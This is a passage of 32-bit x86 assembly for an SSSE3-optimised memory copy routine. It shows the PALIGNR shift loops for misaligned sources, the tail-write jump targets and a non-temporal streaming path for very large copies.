add $0x10, %eax
movdqa %xmm0, (%edx)
add $0x10, %edx
L(shl_0_cache_less_16bytes):
add %ecx, %edx /* final 0..15 bytes via the forward jump table */
add %ecx, %eax
BRANCH_TO_JMPTBL_ENTRY (L(table_48bytes_fwd), %ecx, 4)
ALIGN (4)
L(shl_0_gobble_mem_loop):
prefetcht0 0x1c0(%eax)
prefetcht0 0x280(%eax)
prefetcht0 0x1c0(%edx)
movdqa (%eax), %xmm0
movdqa 0x10(%eax), %xmm1
movdqa 0x20(%eax), %xmm2
movdqa 0x30(%eax), %xmm3
movdqa 0x40(%eax), %xmm4
movdqa 0x50(%eax), %xmm5
movdqa 0x60(%eax), %xmm6
movdqa 0x70(%eax), %xmm7
lea 0x80(%eax), %eax
sub $0x80, %ecx
movdqa %xmm0, (%edx)
movdqa %xmm1, 0x10(%edx)
movdqa %xmm2, 0x20(%edx)
movdqa %xmm3, 0x30(%edx)
movdqa %xmm4, 0x40(%edx)
movdqa %xmm5, 0x50(%edx)
movdqa %xmm6, 0x60(%edx)
movdqa %xmm7, 0x70(%edx)
lea 0x80(%edx), %edx
jae L(shl_0_gobble_mem_loop)
cmp $-0x40, %ecx
lea 0x80(%ecx), %ecx
jl L(shl_0_mem_less_64bytes)
movdqa (%eax), %xmm0
sub $0x40, %ecx
movdqa 0x10(%eax), %xmm1
movdqa %xmm0, (%edx)
movdqa %xmm1, 0x10(%edx)
movdqa 0x20(%eax), %xmm0
movdqa 0x30(%eax), %xmm1
add $0x40, %eax
movdqa %xmm0, 0x20(%edx)
movdqa %xmm1, 0x30(%edx)
add $0x40, %edx
L(shl_0_mem_less_64bytes):
cmp $0x20, %ecx
jb L(shl_0_mem_less_32bytes)
movdqa (%eax), %xmm0
sub $0x20, %ecx
movdqa 0x10(%eax), %xmm1
add $0x20, %eax
movdqa %xmm0, (%edx)
movdqa %xmm1, 0x10(%edx)
add $0x20, %edx
L(shl_0_mem_less_32bytes):
cmp $0x10, %ecx
jb L(shl_0_mem_less_16bytes)
sub $0x10, %ecx
movdqa (%eax), %xmm0
add $0x10, %eax
movdqa %xmm0, (%edx)
add $0x10, %edx
L(shl_0_mem_less_16bytes):
add %ecx, %edx
add %ecx, %eax
BRANCH_TO_JMPTBL_ENTRY (L(table_48bytes_fwd), %ecx, 4)
	ALIGN (4)
/* shl_1: the source is 1 byte past a 16-byte boundary.  Back the
   source pointer down to alignment and re-join neighbouring aligned
   loads with PALIGNR $1.  The shl_2..shl_15 blocks that follow are
   this same code with shift immediate N.  */
L(shl_1):
	BRANCH_TO_JMPTBL_ENTRY_VALUE(L(table_48bytes_fwd))
	lea	-1(%eax), %eax		/* align src down by its 1-byte offset */
	movaps	(%eax), %xmm1		/* %xmm1 = previous aligned 16-byte chunk */
	xor	%edi, %edi		/* %edi = running offset */
	lea	-32(%ecx), %ecx		/* bias count; carry (jb) marks the last pass */
	movdqu	%xmm0, (%esi)		/* flush the saved 16-byte head */
	POP (%esi)
L(shl_1_loop):
	/* Two iterations interleaved: the carried-over chunk ping-pongs
	   between %xmm1 (first half) and %xmm4 (second half).  */
	movdqa	16(%eax, %edi), %xmm2
	sub	$32, %ecx
	movdqa	32(%eax, %edi), %xmm3
	movdqa	%xmm3, %xmm4
	palignr	$1, %xmm2, %xmm3
	palignr	$1, %xmm1, %xmm2
	lea	32(%edi), %edi
	movdqa	%xmm2, -32(%edx, %edi)
	movdqa	%xmm3, -16(%edx, %edi)
	jb	L(shl_1_end)
	movdqa	16(%eax, %edi), %xmm2
	sub	$32, %ecx
	movdqa	32(%eax, %edi), %xmm3
	movdqa	%xmm3, %xmm1
	palignr	$1, %xmm2, %xmm3
	palignr	$1, %xmm4, %xmm2
	lea	32(%edi), %edi
	movdqa	%xmm2, -32(%edx, %edi)
	movdqa	%xmm3, -16(%edx, %edi)
	jae	L(shl_1_loop)
L(shl_1_end):
	lea	32(%ecx), %ecx		/* undo the -32 bias: %ecx = tail length */
	add	%ecx, %edi
	add	%edi, %edx
	lea	1(%edi, %eax), %eax	/* restore the original (unaligned) src cursor */
	POP (%edi)
	BRANCH_TO_JMPTBL_ENTRY_TAIL(L(table_48bytes_fwd), %ecx, 4)
ALIGN (4)
L(shl_2):
BRANCH_TO_JMPTBL_ENTRY_VALUE(L(table_48bytes_fwd))
lea -2(%eax), %eax
movaps (%eax), %xmm1
xor %edi, %edi
lea -32(%ecx), %ecx
movdqu %xmm0, (%esi)
POP (%esi)
L(shl_2_loop):
movdqa 16(%eax, %edi), %xmm2
sub $32, %ecx
movdqa 32(%eax, %edi), %xmm3
movdqa %xmm3, %xmm4
palignr $2, %xmm2, %xmm3
palignr $2, %xmm1, %xmm2
lea 32(%edi), %edi
movdqa %xmm2, -32(%edx, %edi)
movdqa %xmm3, -16(%edx, %edi)
jb L(shl_2_end)
movdqa 16(%eax, %edi), %xmm2
sub $32, %ecx
movdqa 32(%eax, %edi), %xmm3
movdqa %xmm3, %xmm1
palignr $2, %xmm2, %xmm3
palignr $2, %xmm4, %xmm2
lea 32(%edi), %edi
movdqa %xmm2, -32(%edx, %edi)
movdqa %xmm3, -16(%edx, %edi)
jae L(shl_2_loop)
L(shl_2_end):
lea 32(%ecx), %ecx
add %ecx, %edi
add %edi, %edx
lea 2(%edi, %eax), %eax
POP (%edi)
BRANCH_TO_JMPTBL_ENTRY_TAIL(L(table_48bytes_fwd), %ecx, 4)
ALIGN (4)
L(shl_3):
BRANCH_TO_JMPTBL_ENTRY_VALUE(L(table_48bytes_fwd))
lea -3(%eax), %eax
movaps (%eax), %xmm1
xor %edi, %edi
lea -32(%ecx), %ecx
movdqu %xmm0, (%esi)
POP (%esi)
L(shl_3_loop):
movdqa 16(%eax, %edi), %xmm2
sub $32, %ecx
movdqa 32(%eax, %edi), %xmm3
movdqa %xmm3, %xmm4
palignr $3, %xmm2, %xmm3
palignr $3, %xmm1, %xmm2
lea 32(%edi), %edi
movdqa %xmm2, -32(%edx, %edi)
movdqa %xmm3, -16(%edx, %edi)
jb L(shl_3_end)
movdqa 16(%eax, %edi), %xmm2
sub $32, %ecx
movdqa 32(%eax, %edi), %xmm3
movdqa %xmm3, %xmm1
palignr $3, %xmm2, %xmm3
palignr $3, %xmm4, %xmm2
lea 32(%edi), %edi
movdqa %xmm2, -32(%edx, %edi)
movdqa %xmm3, -16(%edx, %edi)
jae L(shl_3_loop)
L(shl_3_end):
lea 32(%ecx), %ecx
add %ecx, %edi
add %edi, %edx
lea 3(%edi, %eax), %eax
POP (%edi)
BRANCH_TO_JMPTBL_ENTRY_TAIL(L(table_48bytes_fwd), %ecx, 4)
ALIGN (4)
L(shl_4):
BRANCH_TO_JMPTBL_ENTRY_VALUE(L(table_48bytes_fwd))
lea -4(%eax), %eax
movaps (%eax), %xmm1
xor %edi, %edi
lea -32(%ecx), %ecx
movdqu %xmm0, (%esi)
POP (%esi)
L(shl_4_loop):
movdqa 16(%eax, %edi), %xmm2
sub $32, %ecx
movdqa 32(%eax, %edi), %xmm3
movdqa %xmm3, %xmm4
palignr $4, %xmm2, %xmm3
palignr $4, %xmm1, %xmm2
lea 32(%edi), %edi
movdqa %xmm2, -32(%edx, %edi)
movdqa %xmm3, -16(%edx, %edi)
jb L(shl_4_end)
movdqa 16(%eax, %edi), %xmm2
sub $32, %ecx
movdqa 32(%eax, %edi), %xmm3
movdqa %xmm3, %xmm1
palignr $4, %xmm2, %xmm3
palignr $4, %xmm4, %xmm2
lea 32(%edi), %edi
movdqa %xmm2, -32(%edx, %edi)
movdqa %xmm3, -16(%edx, %edi)
jae L(shl_4_loop)
L(shl_4_end):
lea 32(%ecx), %ecx
add %ecx, %edi
add %edi, %edx
lea 4(%edi, %eax), %eax
POP (%edi)
BRANCH_TO_JMPTBL_ENTRY_TAIL(L(table_48bytes_fwd), %ecx, 4)
ALIGN (4)
L(shl_5):
BRANCH_TO_JMPTBL_ENTRY_VALUE(L(table_48bytes_fwd))
lea -5(%eax), %eax
movaps (%eax), %xmm1
xor %edi, %edi
lea -32(%ecx), %ecx
movdqu %xmm0, (%esi)
POP (%esi)
L(shl_5_loop):
movdqa 16(%eax, %edi), %xmm2
sub $32, %ecx
movdqa 32(%eax, %edi), %xmm3
movdqa %xmm3, %xmm4
palignr $5, %xmm2, %xmm3
palignr $5, %xmm1, %xmm2
lea 32(%edi), %edi
movdqa %xmm2, -32(%edx, %edi)
movdqa %xmm3, -16(%edx, %edi)
jb L(shl_5_end)
movdqa 16(%eax, %edi), %xmm2
sub $32, %ecx
movdqa 32(%eax, %edi), %xmm3
movdqa %xmm3, %xmm1
palignr $5, %xmm2, %xmm3
palignr $5, %xmm4, %xmm2
lea 32(%edi), %edi
movdqa %xmm2, -32(%edx, %edi)
movdqa %xmm3, -16(%edx, %edi)
jae L(shl_5_loop)
L(shl_5_end):
lea 32(%ecx), %ecx
add %ecx, %edi
add %edi, %edx
lea 5(%edi, %eax), %eax
POP (%edi)
BRANCH_TO_JMPTBL_ENTRY_TAIL(L(table_48bytes_fwd), %ecx, 4)
ALIGN (4)
L(shl_6):
BRANCH_TO_JMPTBL_ENTRY_VALUE(L(table_48bytes_fwd))
lea -6(%eax), %eax
movaps (%eax), %xmm1
xor %edi, %edi
lea -32(%ecx), %ecx
movdqu %xmm0, (%esi)
POP (%esi)
L(shl_6_loop):
movdqa 16(%eax, %edi), %xmm2
sub $32, %ecx
movdqa 32(%eax, %edi), %xmm3
movdqa %xmm3, %xmm4
palignr $6, %xmm2, %xmm3
palignr $6, %xmm1, %xmm2
lea 32(%edi), %edi
movdqa %xmm2, -32(%edx, %edi)
movdqa %xmm3, -16(%edx, %edi)
jb L(shl_6_end)
movdqa 16(%eax, %edi), %xmm2
sub $32, %ecx
movdqa 32(%eax, %edi), %xmm3
movdqa %xmm3, %xmm1
palignr $6, %xmm2, %xmm3
palignr $6, %xmm4, %xmm2
lea 32(%edi), %edi
movdqa %xmm2, -32(%edx, %edi)
movdqa %xmm3, -16(%edx, %edi)
jae L(shl_6_loop)
L(shl_6_end):
lea 32(%ecx), %ecx
add %ecx, %edi
add %edi, %edx
lea 6(%edi, %eax), %eax
POP (%edi)
BRANCH_TO_JMPTBL_ENTRY_TAIL(L(table_48bytes_fwd), %ecx, 4)
ALIGN (4)
L(shl_7):
BRANCH_TO_JMPTBL_ENTRY_VALUE(L(table_48bytes_fwd))
lea -7(%eax), %eax
movaps (%eax), %xmm1
xor %edi, %edi
lea -32(%ecx), %ecx
movdqu %xmm0, (%esi)
POP (%esi)
L(shl_7_loop):
movdqa 16(%eax, %edi), %xmm2
sub $32, %ecx
movdqa 32(%eax, %edi), %xmm3
movdqa %xmm3, %xmm4
palignr $7, %xmm2, %xmm3
palignr $7, %xmm1, %xmm2
lea 32(%edi), %edi
movdqa %xmm2, -32(%edx, %edi)
movdqa %xmm3, -16(%edx, %edi)
jb L(shl_7_end)
movdqa 16(%eax, %edi), %xmm2
sub $32, %ecx
movdqa 32(%eax, %edi), %xmm3
movdqa %xmm3, %xmm1
palignr $7, %xmm2, %xmm3
palignr $7, %xmm4, %xmm2
lea 32(%edi), %edi
movdqa %xmm2, -32(%edx, %edi)
movdqa %xmm3, -16(%edx, %edi)
jae L(shl_7_loop)
L(shl_7_end):
lea 32(%ecx), %ecx
add %ecx, %edi
add %edi, %edx
lea 7(%edi, %eax), %eax
POP (%edi)
BRANCH_TO_JMPTBL_ENTRY_TAIL(L(table_48bytes_fwd), %ecx, 4)
ALIGN (4)
L(shl_8):
BRANCH_TO_JMPTBL_ENTRY_VALUE(L(table_48bytes_fwd))
lea -8(%eax), %eax
movaps (%eax), %xmm1
xor %edi, %edi
lea -32(%ecx), %ecx
movdqu %xmm0, (%esi)
POP (%esi)
L(shl_8_loop):
movdqa 16(%eax, %edi), %xmm2
sub $32, %ecx
movdqa 32(%eax, %edi), %xmm3
movdqa %xmm3, %xmm4
palignr $8, %xmm2, %xmm3
palignr $8, %xmm1, %xmm2
lea 32(%edi), %edi
movdqa %xmm2, -32(%edx, %edi)
movdqa %xmm3, -16(%edx, %edi)
jb L(shl_8_end)
movdqa 16(%eax, %edi), %xmm2
sub $32, %ecx
movdqa 32(%eax, %edi), %xmm3
movdqa %xmm3, %xmm1
palignr $8, %xmm2, %xmm3
palignr $8, %xmm4, %xmm2
lea 32(%edi), %edi
movdqa %xmm2, -32(%edx, %edi)
movdqa %xmm3, -16(%edx, %edi)
jae L(shl_8_loop)
L(shl_8_end):
lea 32(%ecx), %ecx
add %ecx, %edi
add %edi, %edx
lea 8(%edi, %eax), %eax
POP (%edi)
BRANCH_TO_JMPTBL_ENTRY_TAIL(L(table_48bytes_fwd), %ecx, 4)
ALIGN (4)
L(shl_9):
BRANCH_TO_JMPTBL_ENTRY_VALUE(L(table_48bytes_fwd))
lea -9(%eax), %eax
movaps (%eax), %xmm1
xor %edi, %edi
lea -32(%ecx), %ecx
movdqu %xmm0, (%esi)
POP (%esi)
L(shl_9_loop):
movdqa 16(%eax, %edi), %xmm2
sub $32, %ecx
movdqa 32(%eax, %edi), %xmm3
movdqa %xmm3, %xmm4
palignr $9, %xmm2, %xmm3
palignr $9, %xmm1, %xmm2
lea 32(%edi), %edi
movdqa %xmm2, -32(%edx, %edi)
movdqa %xmm3, -16(%edx, %edi)
jb L(shl_9_end)
movdqa 16(%eax, %edi), %xmm2
sub $32, %ecx
movdqa 32(%eax, %edi), %xmm3
movdqa %xmm3, %xmm1
palignr $9, %xmm2, %xmm3
palignr $9, %xmm4, %xmm2
lea 32(%edi), %edi
movdqa %xmm2, -32(%edx, %edi)
movdqa %xmm3, -16(%edx, %edi)
jae L(shl_9_loop)
L(shl_9_end):
lea 32(%ecx), %ecx
add %ecx, %edi
add %edi, %edx
lea 9(%edi, %eax), %eax
POP (%edi)
BRANCH_TO_JMPTBL_ENTRY_TAIL(L(table_48bytes_fwd), %ecx, 4)
ALIGN (4)
L(shl_10):
BRANCH_TO_JMPTBL_ENTRY_VALUE(L(table_48bytes_fwd))
lea -10(%eax), %eax
movaps (%eax), %xmm1
xor %edi, %edi
lea -32(%ecx), %ecx
movdqu %xmm0, (%esi)
POP (%esi)
L(shl_10_loop):
movdqa 16(%eax, %edi), %xmm2
sub $32, %ecx
movdqa 32(%eax, %edi), %xmm3
movdqa %xmm3, %xmm4
palignr $10, %xmm2, %xmm3
palignr $10, %xmm1, %xmm2
lea 32(%edi), %edi
movdqa %xmm2, -32(%edx, %edi)
movdqa %xmm3, -16(%edx, %edi)
jb L(shl_10_end)
movdqa 16(%eax, %edi), %xmm2
sub $32, %ecx
movdqa 32(%eax, %edi), %xmm3
movdqa %xmm3, %xmm1
palignr $10, %xmm2, %xmm3
palignr $10, %xmm4, %xmm2
lea 32(%edi), %edi
movdqa %xmm2, -32(%edx, %edi)
movdqa %xmm3, -16(%edx, %edi)
jae L(shl_10_loop)
L(shl_10_end):
lea 32(%ecx), %ecx
add %ecx, %edi
add %edi, %edx
lea 10(%edi, %eax), %eax
POP (%edi)
BRANCH_TO_JMPTBL_ENTRY_TAIL(L(table_48bytes_fwd), %ecx, 4)
ALIGN (4)
L(shl_11):
BRANCH_TO_JMPTBL_ENTRY_VALUE(L(table_48bytes_fwd))
lea -11(%eax), %eax
movaps (%eax), %xmm1
xor %edi, %edi
lea -32(%ecx), %ecx
movdqu %xmm0, (%esi)
POP (%esi)
L(shl_11_loop):
movdqa 16(%eax, %edi), %xmm2
sub $32, %ecx
movdqa 32(%eax, %edi), %xmm3
movdqa %xmm3, %xmm4
palignr $11, %xmm2, %xmm3
palignr $11, %xmm1, %xmm2
lea 32(%edi), %edi
movdqa %xmm2, -32(%edx, %edi)
movdqa %xmm3, -16(%edx, %edi)
jb L(shl_11_end)
movdqa 16(%eax, %edi), %xmm2
sub $32, %ecx
movdqa 32(%eax, %edi), %xmm3
movdqa %xmm3, %xmm1
palignr $11, %xmm2, %xmm3
palignr $11, %xmm4, %xmm2
lea 32(%edi), %edi
movdqa %xmm2, -32(%edx, %edi)
movdqa %xmm3, -16(%edx, %edi)
jae L(shl_11_loop)
L(shl_11_end):
lea 32(%ecx), %ecx
add %ecx, %edi
add %edi, %edx
lea 11(%edi, %eax), %eax
POP (%edi)
BRANCH_TO_JMPTBL_ENTRY_TAIL(L(table_48bytes_fwd), %ecx, 4)
ALIGN (4)
L(shl_12):
BRANCH_TO_JMPTBL_ENTRY_VALUE(L(table_48bytes_fwd))
lea -12(%eax), %eax
movaps (%eax), %xmm1
xor %edi, %edi
lea -32(%ecx), %ecx
movdqu %xmm0, (%esi)
POP (%esi)
L(shl_12_loop):
movdqa 16(%eax, %edi), %xmm2
sub $32, %ecx
movdqa 32(%eax, %edi), %xmm3
movdqa %xmm3, %xmm4
palignr $12, %xmm2, %xmm3
palignr $12, %xmm1, %xmm2
lea 32(%edi), %edi
movdqa %xmm2, -32(%edx, %edi)
movdqa %xmm3, -16(%edx, %edi)
jb L(shl_12_end)
movdqa 16(%eax, %edi), %xmm2
sub $32, %ecx
movdqa 32(%eax, %edi), %xmm3
movdqa %xmm3, %xmm1
palignr $12, %xmm2, %xmm3
palignr $12, %xmm4, %xmm2
lea 32(%edi), %edi
movdqa %xmm2, -32(%edx, %edi)
movdqa %xmm3, -16(%edx, %edi)
jae L(shl_12_loop)
L(shl_12_end):
lea 32(%ecx), %ecx
add %ecx, %edi
add %edi, %edx
lea 12(%edi, %eax), %eax
POP (%edi)
BRANCH_TO_JMPTBL_ENTRY_TAIL(L(table_48bytes_fwd), %ecx, 4)
ALIGN (4)
L(shl_13):
BRANCH_TO_JMPTBL_ENTRY_VALUE(L(table_48bytes_fwd))
lea -13(%eax), %eax
movaps (%eax), %xmm1
xor %edi, %edi
lea -32(%ecx), %ecx
movdqu %xmm0, (%esi)
POP (%esi)
L(shl_13_loop):
movdqa 16(%eax, %edi), %xmm2
sub $32, %ecx
movdqa 32(%eax, %edi), %xmm3
movdqa %xmm3, %xmm4
palignr $13, %xmm2, %xmm3
palignr $13, %xmm1, %xmm2
lea 32(%edi), %edi
movdqa %xmm2, -32(%edx, %edi)
movdqa %xmm3, -16(%edx, %edi)
jb L(shl_13_end)
movdqa 16(%eax, %edi), %xmm2
sub $32, %ecx
movdqa 32(%eax, %edi), %xmm3
movdqa %xmm3, %xmm1
palignr $13, %xmm2, %xmm3
palignr $13, %xmm4, %xmm2
lea 32(%edi), %edi
movdqa %xmm2, -32(%edx, %edi)
movdqa %xmm3, -16(%edx, %edi)
jae L(shl_13_loop)
L(shl_13_end):
lea 32(%ecx), %ecx
add %ecx, %edi
add %edi, %edx
lea 13(%edi, %eax), %eax
POP (%edi)
BRANCH_TO_JMPTBL_ENTRY_TAIL(L(table_48bytes_fwd), %ecx, 4)
ALIGN (4)
L(shl_14):
BRANCH_TO_JMPTBL_ENTRY_VALUE(L(table_48bytes_fwd))
lea -14(%eax), %eax
movaps (%eax), %xmm1
xor %edi, %edi
lea -32(%ecx), %ecx
movdqu %xmm0, (%esi)
POP (%esi)
L(shl_14_loop):
movdqa 16(%eax, %edi), %xmm2
sub $32, %ecx
movdqa 32(%eax, %edi), %xmm3
movdqa %xmm3, %xmm4
palignr $14, %xmm2, %xmm3
palignr $14, %xmm1, %xmm2
lea 32(%edi), %edi
movdqa %xmm2, -32(%edx, %edi)
movdqa %xmm3, -16(%edx, %edi)
jb L(shl_14_end)
movdqa 16(%eax, %edi), %xmm2
sub $32, %ecx
movdqa 32(%eax, %edi), %xmm3
movdqa %xmm3, %xmm1
palignr $14, %xmm2, %xmm3
palignr $14, %xmm4, %xmm2
lea 32(%edi), %edi
movdqa %xmm2, -32(%edx, %edi)
movdqa %xmm3, -16(%edx, %edi)
jae L(shl_14_loop)
L(shl_14_end):
lea 32(%ecx), %ecx
add %ecx, %edi
add %edi, %edx
lea 14(%edi, %eax), %eax
POP (%edi)
BRANCH_TO_JMPTBL_ENTRY_TAIL(L(table_48bytes_fwd), %ecx, 4)
ALIGN (4)
L(shl_15):
BRANCH_TO_JMPTBL_ENTRY_VALUE(L(table_48bytes_fwd))
lea -15(%eax), %eax
movaps (%eax), %xmm1
xor %edi, %edi
lea -32(%ecx), %ecx
movdqu %xmm0, (%esi)
POP (%esi)
L(shl_15_loop):
movdqa 16(%eax, %edi), %xmm2
sub $32, %ecx
movdqa 32(%eax, %edi), %xmm3
movdqa %xmm3, %xmm4
palignr $15, %xmm2, %xmm3
palignr $15, %xmm1, %xmm2
lea 32(%edi), %edi
movdqa %xmm2, -32(%edx, %edi)
movdqa %xmm3, -16(%edx, %edi)
jb L(shl_15_end)
movdqa 16(%eax, %edi), %xmm2
sub $32, %ecx
movdqa 32(%eax, %edi), %xmm3
movdqa %xmm3, %xmm1
palignr $15, %xmm2, %xmm3
palignr $15, %xmm4, %xmm2
lea 32(%edi), %edi
movdqa %xmm2, -32(%edx, %edi)
movdqa %xmm3, -16(%edx, %edi)
jae L(shl_15_loop)
L(shl_15_end):
lea 32(%ecx), %ecx
add %ecx, %edi
add %edi, %edx
lea 15(%edi, %eax), %eax
POP (%edi)
BRANCH_TO_JMPTBL_ENTRY_TAIL(L(table_48bytes_fwd), %ecx, 4)
ALIGN (4)
L(fwd_write_44bytes):
movl -44(%eax), %ecx
movl %ecx, -44(%edx)
L(fwd_write_40bytes):
movl -40(%eax), %ecx
movl %ecx, -40(%edx)
L(fwd_write_36bytes):
movl -36(%eax), %ecx
movl %ecx, -36(%edx)
L(fwd_write_32bytes):
movl -32(%eax), %ecx
movl %ecx, -32(%edx)
L(fwd_write_28bytes):
movl -28(%eax), %ecx
movl %ecx, -28(%edx)
L(fwd_write_24bytes):
movl -24(%eax), %ecx
movl %ecx, -24(%edx)
L(fwd_write_20bytes):
movl -20(%eax), %ecx
movl %ecx, -20(%edx)
L(fwd_write_16bytes):
movl -16(%eax), %ecx
movl %ecx, -16(%edx)
L(fwd_write_12bytes):
movl -12(%eax), %ecx
movl %ecx, -12(%edx)
L(fwd_write_8bytes):
movl -8(%eax), %ecx
movl %ecx, -8(%edx)
L(fwd_write_4bytes):
movl -4(%eax), %ecx
movl %ecx, -4(%edx)
L(fwd_write_0bytes):
#ifndef USE_AS_BCOPY
# ifdef USE_AS_MEMPCPY
movl %edx, %eax
# else
movl DEST(%esp), %eax
# endif
#endif
RETURN
ALIGN (4)
L(fwd_write_5bytes):
movl -5(%eax), %ecx
movl -4(%eax), %eax
movl %ecx, -5(%edx)
movl %eax, -4(%edx)
#ifndef USE_AS_BCOPY
# ifdef USE_AS_MEMPCPY
movl %edx, %eax
# else
movl DEST(%esp), %eax
# endif
#endif
RETURN
ALIGN (4)
L(fwd_write_45bytes):
movl -45(%eax), %ecx
movl %ecx, -45(%edx)
L(fwd_write_41bytes):
movl -41(%eax), %ecx
movl %ecx, -41(%edx)
L(fwd_write_37bytes):
movl -37(%eax), %ecx
movl %ecx, -37(%edx)
L(fwd_write_33bytes):
movl -33(%eax), %ecx
movl %ecx, -33(%edx)
L(fwd_write_29bytes):
movl -29(%eax), %ecx
movl %ecx, -29(%edx)
L(fwd_write_25bytes):
movl -25(%eax), %ecx
movl %ecx, -25(%edx)
L(fwd_write_21bytes):
movl -21(%eax), %ecx
movl %ecx, -21(%edx)
L(fwd_write_17bytes):
movl -17(%eax), %ecx
movl %ecx, -17(%edx)
L(fwd_write_13bytes):
movl -13(%eax), %ecx
movl %ecx, -13(%edx)
L(fwd_write_9bytes):
movl -9(%eax), %ecx
movl %ecx, -9(%edx)
movl -5(%eax), %ecx
movl %ecx, -5(%edx)
L(fwd_write_1bytes):
movzbl -1(%eax), %ecx
movb %cl, -1(%edx)
#ifndef USE_AS_BCOPY
# ifdef USE_AS_MEMPCPY
movl %edx, %eax
# else
movl DEST(%esp), %eax
# endif
#endif
RETURN
ALIGN (4)
L(fwd_write_46bytes):
movl -46(%eax), %ecx
movl %ecx, -46(%edx)
L(fwd_write_42bytes):
movl -42(%eax), %ecx
movl %ecx, -42(%edx)
L(fwd_write_38bytes):
movl -38(%eax), %ecx
movl %ecx, -38(%edx)
L(fwd_write_34bytes):
movl -34(%eax), %ecx
movl %ecx, -34(%edx)
L(fwd_write_30bytes):
movl -30(%eax), %ecx
movl %ecx, -30(%edx)
L(fwd_write_26bytes):
movl -26(%eax), %ecx
movl %ecx, -26(%edx)
L(fwd_write_22bytes):
movl -22(%eax), %ecx
movl %ecx, -22(%edx)
L(fwd_write_18bytes):
movl -18(%eax), %ecx
movl %ecx, -18(%edx)
L(fwd_write_14bytes):
movl -14(%eax), %ecx
movl %ecx, -14(%edx)
L(fwd_write_10bytes):
movl -10(%eax), %ecx
movl %ecx, -10(%edx)
L(fwd_write_6bytes):
movl -6(%eax), %ecx
movl %ecx, -6(%edx)
L(fwd_write_2bytes):
movzwl -2(%eax), %ecx
movw %cx, -2(%edx)
#ifndef USE_AS_BCOPY
# ifdef USE_AS_MEMPCPY
movl %edx, %eax
# else
movl DEST(%esp), %eax
# endif
#endif
RETURN
ALIGN (4)
L(fwd_write_47bytes):
movl -47(%eax), %ecx
movl %ecx, -47(%edx)
L(fwd_write_43bytes):
movl -43(%eax), %ecx
movl %ecx, -43(%edx)
L(fwd_write_39bytes):
movl -39(%eax), %ecx
movl %ecx, -39(%edx)
L(fwd_write_35bytes):
movl -35(%eax), %ecx
movl %ecx, -35(%edx)
L(fwd_write_31bytes):
movl -31(%eax), %ecx
movl %ecx, -31(%edx)
L(fwd_write_27bytes):
movl -27(%eax), %ecx
movl %ecx, -27(%edx)
L(fwd_write_23bytes):
movl -23(%eax), %ecx
movl %ecx, -23(%edx)
L(fwd_write_19bytes):
movl -19(%eax), %ecx
movl %ecx, -19(%edx)
L(fwd_write_15bytes):
movl -15(%eax), %ecx
movl %ecx, -15(%edx)
L(fwd_write_11bytes):
movl -11(%eax), %ecx
movl %ecx, -11(%edx)
L(fwd_write_7bytes):
movl -7(%eax), %ecx
movl %ecx, -7(%edx)
L(fwd_write_3bytes):
movzwl -3(%eax), %ecx
movzbl -1(%eax), %eax
movw %cx, -3(%edx)
movb %al, -1(%edx)
#ifndef USE_AS_BCOPY
# ifdef USE_AS_MEMPCPY
movl %edx, %eax
# else
movl DEST(%esp), %eax
# endif
#endif
RETURN
	ALIGN (4)
/* Very large copies (>= half the shared cache): stream with
   non-temporal stores (MOVNTDQ) so the copy does not evict the
   cache.  Loads stay unaligned (MOVDQU); only dst is 16-aligned.  */
L(large_page):
	movdqu	(%eax), %xmm1
	lea	16(%eax), %eax
	movdqu	%xmm0, (%esi)		/* flush the saved head to the original dst */
	movntdq	%xmm1, (%edx)
	lea	16(%edx), %edx
	POP (%esi)
	lea	-0x90(%ecx), %ecx	/* bias by 16 (just copied) + 128 (loop stride) */
	POP (%edi)
L(large_page_loop):
	movdqu	(%eax), %xmm0
	movdqu	0x10(%eax), %xmm1
	movdqu	0x20(%eax), %xmm2
	movdqu	0x30(%eax), %xmm3
	movdqu	0x40(%eax), %xmm4
	movdqu	0x50(%eax), %xmm5
	movdqu	0x60(%eax), %xmm6
	movdqu	0x70(%eax), %xmm7
	lea	0x80(%eax), %eax
	sub	$0x80, %ecx
	movntdq	%xmm0, (%edx)
	movntdq	%xmm1, 0x10(%edx)
	movntdq	%xmm2, 0x20(%edx)
	movntdq	%xmm3, 0x30(%edx)
	movntdq	%xmm4, 0x40(%edx)
	movntdq	%xmm5, 0x50(%edx)
	movntdq	%xmm6, 0x60(%edx)
	movntdq	%xmm7, 0x70(%edx)
	lea	0x80(%edx), %edx
	jae	L(large_page_loop)
	/* Un-bias the count and peel 64- then 32-byte chunks.  */
	cmp	$-0x40, %ecx
	lea	0x80(%ecx), %ecx
	jl	L(large_page_less_64bytes)
	movdqu	(%eax), %xmm0
	movdqu	0x10(%eax), %xmm1
	movdqu	0x20(%eax), %xmm2
	movdqu	0x30(%eax), %xmm3
	lea	0x40(%eax), %eax
	movntdq	%xmm0, (%edx)
	movntdq	%xmm1, 0x10(%edx)
	movntdq	%xmm2, 0x20(%edx)
	movntdq	%xmm3, 0x30(%edx)
	lea	0x40(%edx), %edx
	sub	$0x40, %ecx
L(large_page_less_64bytes):
	cmp	$32, %ecx
	jb	L(large_page_less_32bytes)
	movdqu	(%eax), %xmm0
	movdqu	0x10(%eax), %xmm1
	lea	0x20(%eax), %eax
	movntdq	%xmm0, (%edx)
	movntdq	%xmm1, 0x10(%edx)
	lea	0x20(%edx), %edx
	sub	$0x20, %ecx
L(large_page_less_32bytes):
	add	%ecx, %edx
	add	%ecx, %eax
	/* Non-temporal stores are weakly ordered: fence before the
	   regular-store tail writers run.  */
	sfence
	BRANCH_TO_JMPTBL_ENTRY (L(table_48bytes_fwd), %ecx, 4)
ALIGN (4)
L(bk_write_44bytes):
movl 40(%eax), %ecx
movl %ecx, 40(%edx)
L(bk_write_40bytes):
movl 36(%eax), %ecx
movl %ecx, 36(%edx)
L(bk_write_36bytes):
movl 32(%eax), %ecx
movl %ecx, 32(%edx)
L(bk_write_32bytes):
movl 28(%eax), %ecx
movl %ecx, 28(%edx)
L(bk_write_28bytes):
movl 24(%eax), %ecx
movl %ecx, 24(%edx)
L(bk_write_24bytes):
movl 20(%eax), %ecx
movl %ecx, 20(%edx)
L(bk_write_20bytes):
movl 16(%eax), %ecx
movl %ecx, 16(%edx)
L(bk_write_16bytes):
movl 12(%eax), %ecx
movl %ecx, 12(%edx)
L(bk_write_12bytes):
movl 8(%eax), %ecx
movl %ecx, 8(%edx)
L(bk_write_8bytes):
movl 4(%eax), %ecx
movl %ecx, 4(%edx)
L(bk_write_4bytes):
movl (%eax), %ecx
movl %ecx, (%edx)
L(bk_write_0bytes):
#ifndef USE_AS_BCOPY
movl DEST(%esp), %eax
# ifdef USE_AS_MEMPCPY
movl LEN(%esp), %ecx
add %ecx, %eax
# endif
